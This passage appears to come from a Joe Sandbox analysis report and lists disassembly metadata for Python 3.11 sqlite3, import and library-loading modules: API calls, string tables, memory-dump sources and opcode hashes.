                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718AE8
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B04
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B20
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B3C
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B58
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B74
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B90
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718BAC
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718BC8
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718BE4
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718C00
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718C1C
                                                            • PyModule_AddStringConstant.PYTHON311 ref: 00007FFBA47186A8
                                                            • sqlite3_libversion.SQLITE3 ref: 00007FFBA47186B6
                                                            • PyModule_AddStringConstant.PYTHON311 ref: 00007FFBA47186C9
                                                            • sqlite3_threadsafe.SQLITE3 ref: 00007FFBA47186D3
                                                            • PyModule_AddIntConstant.PYTHON311 ref: 00007FFBA47186F6
                                                            • sqlite3_shutdown.SQLITE3 ref: 00007FFBA4718736
                                                            • sqlite3_errstr.SQLITE3 ref: 00007FFBA471D421
                                                            • PyErr_SetString.PYTHON311 ref: 00007FFBA471D434
                                                            • PyErr_Format.PYTHON311 ref: 00007FFBA471D455
                                                              • Part of subcall function 00007FFBA4718744: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA471829C), ref: 00007FFBA471875B
                                                              • Part of subcall function 00007FFBA4718744: PyModule_GetState.PYTHON311(?,?,?,00007FFBA471829C), ref: 00007FFBA471876C
                                                              • Part of subcall function 00007FFBA471878C: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182AC), ref: 00007FFBA47187A3
                                                              • Part of subcall function 00007FFBA471878C: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182AC), ref: 00007FFBA47187B4
                                                              • Part of subcall function 00007FFBA47187D4: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182BC), ref: 00007FFBA47187EB
                                                              • Part of subcall function 00007FFBA47187D4: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182BC), ref: 00007FFBA47187FC
                                                              • Part of subcall function 00007FFBA4718818: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182CC), ref: 00007FFBA471882F
                                                              • Part of subcall function 00007FFBA4718818: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182CC), ref: 00007FFBA4718840
                                                              • Part of subcall function 00007FFBA4718860: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182DC), ref: 00007FFBA4718877
                                                              • Part of subcall function 00007FFBA4718860: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182DC), ref: 00007FFBA4718888
                                                              • Part of subcall function 00007FFBA47188A8: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182EC), ref: 00007FFBA47188BF
                                                              • Part of subcall function 00007FFBA47188A8: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182EC), ref: 00007FFBA47188D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727923666.00007FFBA4711000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FFBA4710000, based on PE: true
                                                            • Associated: 00000004.00000002.2727861785.00007FFBA4710000.00000002.00000001.01000000.00000022.sdmp
                                                            • Associated: 00000004.00000002.2727988873.00007FFBA471E000.00000002.00000001.01000000.00000022.sdmp
                                                            • Associated: 00000004.00000002.2728054434.00007FFBA4728000.00000004.00000001.01000000.00000022.sdmp
                                                            • Associated: 00000004.00000002.2728116429.00007FFBA472A000.00000002.00000001.01000000.00000022.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4710000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Module_$Constant$Type$From$Err_$String$Exception$InternUnicode_$State$ModuleSpecType_$Formatsqlite3_errstrsqlite3_initializesqlite3_libversionsqlite3_libversion_numbersqlite3_shutdownsqlite3_threadsafe
                                                            • String ID: 2.6.0$Unable to interpret SQLite threadsafety mode. Got %d, expected 0, 1, or 2$__adapt__$__conform__$executescript$finalize$inverse$sqlite3.DataError$sqlite3.DatabaseError$sqlite3.Error$sqlite3.IntegrityError$sqlite3.InterfaceError$sqlite3.InternalError$sqlite3.NotSupportedError$sqlite3.OperationalError$sqlite3.ProgrammingError$sqlite3.Warning$sqlite3: SQLite 3.7.15 or higher required$sqlite_version$step$threadsafety$upper$value$version
                                                            • API String ID: 2988601926-849052780
                                                            • Opcode ID: adf0117df44379e2ba4d7d48fc6be53d3fe07d241cd24fa25d9c261ee665d1d4
                                                            • Instruction ID: e806ed535334056c98039d3a976df59315b2f18ac61ee680a86823cd49a0ee3c
                                                            • Opcode Fuzzy Hash: adf0117df44379e2ba4d7d48fc6be53d3fe07d241cd24fa25d9c261ee665d1d4
                                                            • Instruction Fuzzy Hash: F0D1D0A4B0BA83C2FA569F7AE9D4275A394BF46B80B855436CD0E57270EF2CF0148301
                                                            APIs
                                                            • PyImport_Import.PYTHON311(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA4858789), ref: 00007FFBA4860980
                                                            • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA4858789), ref: 00007FFBA48609A9
                                                            • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA4858789), ref: 00007FFBA48609EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2728951566.00007FFBA4851000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FFBA4850000, based on PE: true
                                                            • Associated: 00000004.00000002.2728888781.00007FFBA4850000.00000002.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729020085.00007FFBA4863000.00000002.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729135476.00007FFBA4869000.00000004.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729204761.00007FFBA486D000.00000002.00000001.01000000.00000020.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4850000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Dealloc$ImportImport_
                                                            • String ID: <module>
                                                            • API String ID: 2397823689-217463007
                                                            • Opcode ID: d2be1aa01b1dbe8b3e4e64f86c6d658d020e4521edc391cf9bceee43f547c085
                                                            • Instruction ID: 9c2c374a9a133cffd1de0c6e10ea451a2ef07f3fd53b028f45a2a32a038b49a7
                                                            • Opcode Fuzzy Hash: d2be1aa01b1dbe8b3e4e64f86c6d658d020e4521edc391cf9bceee43f547c085
                                                            • Instruction Fuzzy Hash: BCB2E1E5A0BA86C1EA939B79F8D4178B3A1BF49B85F4440BACD0E07775EF3CA4558301

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727176190.00007FFBA4561000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBA4560000, based on PE: true
                                                            • Associated: 00000004.00000002.2727111159.00007FFBA4560000.00000002.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727309418.00007FFBA4589000.00000004.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727381495.00007FFBA458F000.00000002.00000001.01000000.00000024.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4560000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Unicode_$Err_$Arg_FormatParseSizeTuple_$FreeLibraryLoadMem_$CharClearErrorFromLastLengthStringWide
                                                            • String ID: <None>$O|i:load_library$U|i:load_library$cannot call dlopen(NULL)$cannot load library '%s': %s$dlopen() takes a file name or 'void *' handle, not '%s'$dlopen(None) not supported on Windows$error 0x%x$et|i:load_library$|Oi:load_library
                                                            • API String ID: 563250132-880521189
                                                            • Opcode ID: ee60774dc3b9627a478c1097a96f2330d9506e9b6672ac25e4a7f3879058a169
                                                            • Instruction ID: 72df937c69c192af0a60ad016565deb52980fb8f1aab031e909bfa59d12259bb
                                                            • Opcode Fuzzy Hash: ee60774dc3b9627a478c1097a96f2330d9506e9b6672ac25e4a7f3879058a169
                                                            • Instruction Fuzzy Hash: 209106A1A1BB42D5EB56CF76E8941B863A1FF45B94B480936ED0E476B4DF3CE588C300

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2728951566.00007FFBA4851000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FFBA4850000, based on PE: true
                                                            • Associated: 00000004.00000002.2728888781.00007FFBA4850000.00000002.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729020085.00007FFBA4863000.00000002.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729135476.00007FFBA4869000.00000004.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729204761.00007FFBA486D000.00000002.00000001.01000000.00000020.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4850000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Dealloc$ItemObject_$Err_FormatFromImportObjectUnicode_$AttrClearDict_ErrorFilenameImport_LevelModuleModule_
                                                            • String ID: %U.%U$cannot import name %R from %R (%S)
                                                            • API String ID: 3630264407-438398067
                                                            • Opcode ID: ece2ea5a91f1dd057eb8d64435eaa5ff92b98033e2d5e2640f04719924da41ce
                                                            • Instruction ID: 47c12805357f0c8585d2ee342e8e6a2903936168b291a38dc7a580a179e4fb38
                                                            • Opcode Fuzzy Hash: ece2ea5a91f1dd057eb8d64435eaa5ff92b98033e2d5e2640f04719924da41ce
                                                            • Instruction Fuzzy Hash: C44180A5A0AA86D1EB569F76F884279A7A0FB49FD5F148074CE4D07764EF3CE0058701

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2728951566.00007FFBA4851000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FFBA4850000, based on PE: true
                                                            • Associated: 00000004.00000002.2728888781.00007FFBA4850000.00000002.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729020085.00007FFBA4863000.00000002.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729135476.00007FFBA4869000.00000004.00000001.01000000.00000020.sdmp
                                                            • Associated: 00000004.00000002.2729204761.00007FFBA486D000.00000002.00000001.01000000.00000020.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4850000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Module_$AttrCreate2DeallocDictObject_String
                                                            • String ID: __name__
                                                            • API String ID: 2272293537-3954359393
                                                            • Opcode ID: 541929ddcf8c491025d374671fea7ea31b8098b9d163f129cf1293189f4a4869
                                                            • Instruction ID: 63599251be4874cbe69bf0a543fa520997c02e35033b71bbc47845a9b4d9e530
                                                            • Opcode Fuzzy Hash: 541929ddcf8c491025d374671fea7ea31b8098b9d163f129cf1293189f4a4869
                                                            • Instruction Fuzzy Hash: 0861ACB5E0BA86C1FAA78B75F8D4134B3E4AF48B95F0880B6CD4E02774DF3DA4609641

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727176190.00007FFBA4561000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBA4560000, based on PE: true
                                                            • Associated: 00000004.00000002.2727111159.00007FFBA4560000.00000002.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727309418.00007FFBA4589000.00000004.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727381495.00007FFBA458F000.00000002.00000001.01000000.00000024.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4560000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Unicode_$Library$Arg_CharDeallocErr_ErrorFormatFreeLastLengthLoadObject_ParseSizeTuple_Wide_strdup
                                                            • String ID:
                                                            • API String ID: 2014377733-0
                                                            • Opcode ID: 12d0421d3cd385fbe76f906549a688ad5a16b824a8a22540682aa9ddaff4b47a
                                                            • Instruction ID: 68e04727000a8049ce2e5a3ea047440185391372f11b17bbe35127af54265082
                                                            • Opcode Fuzzy Hash: 12d0421d3cd385fbe76f906549a688ad5a16b824a8a22540682aa9ddaff4b47a
                                                            • Instruction Fuzzy Hash: 920140B6A1BB41C2EA168F75E480179B3A0FF88BA4B480435DE4D42768EF7CD544C740

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727176190.00007FFBA4561000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBA4560000, based on PE: true
                                                            • Associated: 00000004.00000002.2727111159.00007FFBA4560000.00000002.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727309418.00007FFBA4589000.00000004.00000001.01000000.00000024.sdmp
                                                            • Associated: 00000004.00000002.2727381495.00007FFBA458F000.00000002.00000001.01000000.00000024.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4560000_Mai.jbxd
                                                            Similarity
                                                            • API ID: FreeLibraryfree
                                                            • String ID:
                                                            • API String ID: 155010425-0
                                                            • Opcode ID: b7d208bddb73d87533deb9cdba8771a99ab3487d009f0975f4f29743c7270e54
                                                            • Instruction ID: ac652493696dd3c54c05e80f6b488eba78213bf8ee49d00801f93e0ca47e9f07
                                                            • Opcode Fuzzy Hash: b7d208bddb73d87533deb9cdba8771a99ab3487d009f0975f4f29743c7270e54
                                                            • Instruction Fuzzy Hash: 55E0ECA1A1B605C6EB1B8F72D8942382260FB4AF85F180830CE0D062B08F3CD4C6C340

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                            • Instruction ID: 467e86eeb7400a1cab56accad6a92f20c2e86bf05d72737a23dcee0e4f264d25
                                                            • Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                            • Instruction Fuzzy Hash: 66A1E8E5A0BB07C1EE5A8B69E8D433823D1BF45F40F585575CD8E067B0EFACA49A8240
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                            • API String ID: 2221118986-741541785
                                                            • Opcode ID: 929b51b88e2f19a1b25798b663a6f8a6c4e4772c4a7f5eb79516f13274e760a1
                                                            • Instruction ID: 5a6b889a199f4e1899f3d8b98a7f79cdb9e0f5f333335654466f3643de4248e6
                                                            • Opcode Fuzzy Hash: 929b51b88e2f19a1b25798b663a6f8a6c4e4772c4a7f5eb79516f13274e760a1
                                                            • Instruction Fuzzy Hash: EB02BEB2A0A641CAE716CB79E88467E77A1FB85748F14413ADE4E47BA4DF7CE441CB00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: 016bcaee659f030f6ebf97f502d967f123d0fb2ac23bd50cea733b68470f3523
                                                            • Instruction ID: bec5ac93e1b87ef51b213eb3936082a5ed645eb64dfdeaacd1e29d4e8274ee51
                                                            • Opcode Fuzzy Hash: 016bcaee659f030f6ebf97f502d967f123d0fb2ac23bd50cea733b68470f3523
                                                            • Instruction Fuzzy Hash: 57E1D1B261E781CAE7928F35D08476E77A1FB44B84F148036EE4E477A6DE3DE5458300
                                                            APIs
                                                              • Part of subcall function 00007FFBA45EB120: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FFBA4655D3A,?,?,?,?,?,00007FFBA45EAEC2), ref: 00007FFBA45EB2C8
                                                              • Part of subcall function 00007FFBA45EAC10: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBA45E535C), ref: 00007FFBA45EAD7A
                                                              • Part of subcall function 00007FFBA45EAC10: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBA45E535C), ref: 00007FFBA45EAE06
                                                            • memcpy.VCRUNTIME140 ref: 00007FFBA4650402
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$U$U$Y$Z$Z$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                            • API String ID: 3510742995-2880407920
                                                            • Opcode ID: da666670fab5f20300870dbcc3b51ffe10f858a8b1fe0458a16c7cd44fa11382
                                                            • Instruction ID: 6089ce85256e69ebcf2b9d402f5f01077981055c650862542a07c0ac484896f6
                                                            • Opcode Fuzzy Hash: da666670fab5f20300870dbcc3b51ffe10f858a8b1fe0458a16c7cd44fa11382
                                                            • Instruction Fuzzy Hash: CFB180B2A0AB81DAE7628F79E99026A37A0FB44744F006175DF9D07BA5DF3CE0658701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                            • API String ID: 0-3733955532
                                                            • Opcode ID: f4df1b385be62000698d571df5cd47008488a1312fd782e40bbd37ae16b60806
                                                            • Instruction ID: 77c804d4ee2ae8fae696e35da1286f1a31719e3373cb261f4f7ed9acf2bf668f
                                                            • Opcode Fuzzy Hash: f4df1b385be62000698d571df5cd47008488a1312fd782e40bbd37ae16b60806
                                                            • Instruction Fuzzy Hash: F702A2A5A0AA82C1EA568B3DEC9427973A0FF46B85F485176DD8E473B5DF7CE448C300
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                            • API String ID: 3510742995-875588658
                                                            • Opcode ID: 50ca7b058fd646b615b437ac80f3dd14da60ada7258248d4b5f410bfe11147b9
                                                            • Instruction ID: a6a134f5c22f4385a1ab481bbdea3ccc55de58a679e36d61a4b97f933d096c28
                                                            • Opcode Fuzzy Hash: 50ca7b058fd646b615b437ac80f3dd14da60ada7258248d4b5f410bfe11147b9
                                                            • Instruction Fuzzy Hash: 72E180B2F0A652DAFB26CFB4D4847BD27A1AF04748F044136DE1E53AA9DE3CA449C740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                            • API String ID: 2221118986-554953066
                                                            • Opcode ID: 730e8d11a6e24fee74aadef8f820dc0e96c8f802cede018c9e60813f8b1e2d1d
                                                            • Instruction ID: 803b12de6702f426374d208d7dc141bbc77f850df3108cdf7f4fceda2b768cf6
                                                            • Opcode Fuzzy Hash: 730e8d11a6e24fee74aadef8f820dc0e96c8f802cede018c9e60813f8b1e2d1d
                                                            • Instruction Fuzzy Hash: CE329AB2A0AB91C6EBA6CF35C6816A937E4FB48B84F405136DE8D477A5DF38E450C700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                            • API String ID: 3510742995-2846519077
                                                            • Opcode ID: 13fd3e058da161b1aa0f62860385a377fb23014bbc18c08008aba194cc5e7079
                                                            • Instruction ID: c128ac5967cca3a2ce60d5f6d306d0ffc3b011a57e4bddba0c2e5cbbe3a487cb
                                                            • Opcode Fuzzy Hash: 13fd3e058da161b1aa0f62860385a377fb23014bbc18c08008aba194cc5e7079
                                                            • Instruction Fuzzy Hash: 2C02CEA2A0A682C6EB62DF35D4807A93791FB85F88F444236CE4D47BA5DF3CE549C701
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: "%w" $%Q%s
                                                            • API String ID: 438689982-1987291987
                                                            • Opcode ID: c386c09e3d4df8f073a94f50c266d64f9e222731bb102df69f40d6c4415e9e9e
                                                            • Instruction ID: 3486f52f24837d2159fdd7c53f37da2cd5a2c9af2a1c6b12de92cb3f0f2e9629
                                                            • Opcode Fuzzy Hash: c386c09e3d4df8f073a94f50c266d64f9e222731bb102df69f40d6c4415e9e9e
                                                            • Instruction Fuzzy Hash: EEC1C4A1A0AB82C6EA16CF65E48067967A0FF45BA0F544239DE6D077E5DF3CE44AC700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmp
